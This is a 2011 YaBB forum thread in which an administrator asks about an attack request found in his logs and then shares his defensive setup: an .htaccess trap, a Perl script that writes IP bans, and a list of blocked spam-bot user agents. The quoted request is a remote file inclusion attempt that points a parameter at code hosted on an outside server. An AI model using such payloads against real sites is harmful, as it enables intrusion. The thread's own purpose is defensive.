Page Index Toggle Pages: 1
Topic Tools
Normal Topic Ok, what were they trying to do here? (Read 2,407 times)
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Ok, what were they trying to do here?
Dec 9th, 2011 at 2:56pm
Post Tools
Got a spammer doing this:
Code
Select All
yabb2/YaBB.pl?num=xxxxxxxx//delete_all.php?board_skin_path=http://show.ideatree.kr//test/flexupload/auto1.txt?? 



What  in the world are they doing there? I Ip denied their entire block.
  

   
Back to top
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #1 - Dec 9th, 2011 at 4:04pm
Post Tools
Can't say exactly what they're trying but it cannot possibly be good.

I know in my server error files there are dozens of attempts per day to access php files in the yabb directory. (Which, needless to say, don't exist.)

I'm beginning to wonder what potential flaw exists in php that these people are trying to exploit. (In your example they're invoking a path to a non-existent php file too.)
  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #2 - Dec 9th, 2011 at 6:15pm
Post Tools
I passed this along to a programmer on another board and this is their response
Quote:
Looks like it's trying to leverage some kind of vuln in YaBB.pl that would cause a request to be made on a separate site that has a different vulnerability. It's a nasty attempt at an XSS/CSRF vulnerability.


I would say it's a good idea to keep an eye on this. It may or may not be a real vulnerability in YaBB.
  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
JonB
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 3,934
Location: Land of the Blazing Sun!

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #3 - Dec 9th, 2011 at 7:47pm
Post Tools
Hi guys -

I would agree with Dandello's friend's assessment. This surely should be a wake-up call for those who don't look through their access/server/error logs.

I ran a high volume set of self-hosted websites for about 6-7 years, I was on patrol constantly, that was 'with' a multi-thousand dollar investment in a free-standing piece of authentication software, and lots of money spent on Cisco content routers (plus my learning curve and time). We managed to do a good job, but it was not for a lack of commitment on the part of hackers and ne'er-do-wells to hijack and steal...


A webmaster's best friend is his/her logfiles.  Cheesy

Cool
  

I find your lack of faith disturbing.
Back to top
IP Logged
 
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Re: Ok, what were they trying to do here?
Reply #4 - Dec 10th, 2011 at 1:35am
Post Tools
I have seen in the error logs all kinds of odd things since I installed Yabb. stuff with spaces and wierd characters after "action="  I see there used to be security hack and directory tree reading issues in former versions with this.

I also get a lot of people trying to hit yabb.cgi and index.php hits as well.  I put a referrer statement to blast them directly into htaccess and banning.

this one was strange due to the intent of someone trying to use a delete command on all.
  

   
Back to top
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #5 - Dec 10th, 2011 at 4:14am
Post Tools
I get them too and from what I gather, so do people running other forum software. Since forum software is designed to accept form input, the spammers and bots try to exploit anything that looks like a form or query string.

Tell us more about the referrer statement blasting them into the ether.
« Last Edit: Dec 10th, 2011 at 4:21am by Dandello »  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
BloodyRue
Junior Member
**
Offline



Posts: 83

None
Re: Ok, what were they trying to do here?
Reply #6 - Dec 10th, 2011 at 7:23am
Post Tools
Dandello wrote on Dec 10th, 2011 at 4:14am:
Tell us more about the referrer statement blasting them into the ether.


a bit complicated but  when i started my other boards about 10 years ago i did some security coding to keep bad bots and other stuff from getting into directories or harvesting stuff. it has a series of cgi coding and SSI included exec coding that dumps them into the htaccess file with a statement blocking them. I recently added these lines to get anyone trying to hit the yabb cgi file:

placed in the htaccess file
Code
Select All
#blocking spammers for yabb
RedirectMatch YaBB.cgi http://mydomain/cgi-bin/trap.cgi
 



trap.cgi file is a file that autowrites stuff
I have a bunch of coding that writes log files to keep track of what it is doing but the main portion of the trap.cgi file looks like this:
Code
Select All
$test=0;  # if test ==1 then it wont write the htaccess
$basedir = $ENV{DOCUMENT_ROOT};
$htafile = "/\.htaccess";
$termsfile = "/badbot\.htm";
$digestfile = "/spam\.dat";

# Form full pathname to .htaccess file
$htapath = "$basedir"."$htafile";

# Form full pathname to terms.htm file
$termspath = "$basedir"."$termsfile";
$digestpath = "$basedir"."$digestfile";

&trapem;
exit;

sub trapem{
 # Get the bad-bot's IP address, convert to regular-expressions
 #(regex) format by escaping all periods.
 $remaddr = $ENV{REMOTE_ADDR};
 $remaddr =~ s/\./\\\./gi;

 # Get User-agent & current time
 $usragnt = $ENV{HTTP_USER_AGENT};
 $date = scalar localtime(time);

 # Open the .htaccess file and wait for an exclusive lock. This
 # prevents multiple instances of this script from running past
 # the flock statement, and prevents them from trying to read and
 # write the file at the same time, which would corrupt it.
 # When .htaccess is closed, the lock is released.
 #
 # Open existing .htaccess file in r/w append mode, lock it, rewind
 # to start, read current contents into array.

 if($test ne "1"){
   open(HTACCESS,"+>>$htapath") || die $!;
   flock(HTACCESS,2);
   seek(HTACCESS,0,0);
   @contents = <HTACCESS>;

   # Empty existing .htaccess file, then write new IP ban line and
   # previous contents to it
   truncate(HTACCESS,0);
   print HTACCESS ("SetEnvIf Remote_Addr \^$remaddr\$ getout \# $date $usragnt\n");
   print HTACCESS (@contents);

   # close the .htaccess file, releasing lock - allow other instances
   # of this script to proceed.
   close(HTACCESS);
  }
} 



I have stuff written in my script files that bad bots look for that you can't see unless you are parsing the sourcecode. if a bad bot touches it it sends them to this trap file and bans them also.

The end .htaccess file product looks like this at the top:
Code
Select All
SetEnvIf Remote_Addr ^31\.214\.144\.222$ getout # Sat Dec 10 10:57:09 2011 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
SetEnvIf Remote_Addr ^173\.193\.219\.168$ getout # Mon Dec  5 14:16:35 2011 Aboundex/0.2 (http://www.aboundex.com/crawler/)
SetEnvIf Remote_Addr ^74\.202\.210\.158$ getout # Sat Dec  3 23:09:47 2011 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.8) Gecko/20100721 Firefox/3.6.8
SetEnvIf Remote_Addr ^69\.4\.231\.201$ getout # Mon Nov 28 20:08:16 2011 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
 



This is in the root .htaccess file:
Code
Select All
# Block bad-bots using lines written by trap.cgi script above
SetEnvIf Request_URI "^(/403.*\.shtml|/robots\.txt|/badbot\.htm|/cgi-bin/stig403\.cgi|/cgi-bin/spit\.cgi)$" allowsome
<Files *>
order deny,allow
allow from env=allowsome
deny from env=getout
Deny from env=spam_bot
</Files>
 



it then logs their entry, sends me an email and emails their host with an abuse letter.

Also, I have these presets in the root .htaccess file:
Code
Select All
SetEnvIfNoCase User-Agent "EmailCollector/1.0" spam_bot
SetEnvIfNoCase User-Agent "EmailSiphon" spam_bot
SetEnvIfNoCase User-Agent "EmailWolf 1.00" spam_bot
SetEnvIfNoCase User-Agent "Crescent Internet ToolPak HTTP OLE Control v.1.0" spam_bot
SetEnvIfNoCase User-Agent "ExtractorPro" spam_bot
SetEnvIfNoCase User-Agent "Mozilla/2.0 (compatible; NEWT ActiveX; Win32)" spam_bot
SetEnvIfNoCase User-Agent "/0.5 libwww-perl/0.40" spam_bot
SetEnvIfNoCase User-Agent "CherryPickerElite/1.0" spam_bot
SetEnvIfNoCase User-Agent "CherryPickerSE/1.0" spam_bot
SetEnvIfNoCase User-Agent "WebBandit/2.1" spam_bot
SetEnvIfNoCase User-Agent "WebBandit/3.50" spam_bot
SetEnvIfNoCase User-Agent "Webbandit/4.00.0" spam_bot
SetEnvIfNoCase User-Agent "Indy Library" spam_bot
SetEnvIfNoCase User-Agent "Internet Explore 5.x" spam_bot
SetEnvIfNoCase User-Agent "Microsoft URL Control - 6.00.8862" spam_bot
SetEnvIfNoCase User-Agent "Mozilla/3.0 (compatible; Indy Library)" spam_bot
SetEnvIfNoCase User-Agent "Java1.3.1" spam_bot
SetEnvIfNoCase User-Agent "URL_Spider_Pro/3.0 (http://www.innerprise.net/usp-spider.asp)" spam_bot
SetEnvIfNoCase User-Agent "IPiumBot laurion(dot)com" spam_bot
SetEnvIfNoCase User-Agent "URL_Spider_SQL/1.0" spam_bot
SetEnvIfNoCase User-Agent "Lynx/2.8.4rel.1 libwww-FM/2.14 ... human-guided@lerly.net" spam_bot
SetEnvIfNoCase User-Agent "W3CRobot/5.4.0 libwww/5.4.0" spam_bot
SetEnvIfNoCase User-Agent "Zeus 2.6" spam_bot
SetEnvIfNoCase User-Agent "Rover" spam_bot 

« Last Edit: Dec 10th, 2011 at 8:19pm by BloodyRue »  

   
Back to top
IP Logged
 
Dandello
YaBB Administrator
YaBB Next Team
Operations Team
Beta Testers
Support Team
*****
Offline



Posts: 2,399
Location: Earth

YaBB 2.6.1
Re: Ok, what were they trying to do here?
Reply #7 - Dec 10th, 2011 at 4:13pm
Post Tools
And you're NOT on the security team?  Shocked
  

If you only have one solution to a problem you're not trying hard enough!
Back to top
WWW  
IP Logged
 
Page Index Toggle Pages: 1
Topic Tools
 
  « Board Index ‹ Board  ^Top